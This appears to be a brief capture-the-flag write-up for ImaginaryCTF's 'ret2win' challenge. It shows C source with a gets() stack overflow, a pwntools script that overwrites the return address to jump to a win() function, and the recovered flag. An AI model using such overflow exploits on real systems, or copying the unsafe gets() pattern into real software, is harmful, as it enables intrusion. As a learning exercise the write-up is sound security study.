I am an undergraduate student studying security.

less than 1 minute read

Description

Can you overflow the buffer and get the flag? (Hint: if your exploit isn’t working on the remote server, look into stack alignment)

nc ret2win.chal.imaginaryctf.org 1337

Attached

ret2win.zip

Analyzation

Check the file attached

#include <stdio.h>
#include <unistd.h>

int main() {
  char buf[64];
  gets(buf);
}

int win() {
  system("cat flag.txt");
}

gets() is vuln, we can make a stack overflow

Solution

from pwn import *
conn = remote('ret2win.chal.imaginaryctf.org', '1337')
print(conn.recv().decode())
conn.sendline(b'A' * 0x48 + p64(0x401182))
print(conn.recv().decode())

The flag is

ictf{r3turn_0f_th3_k1ng?}

You may also enjoy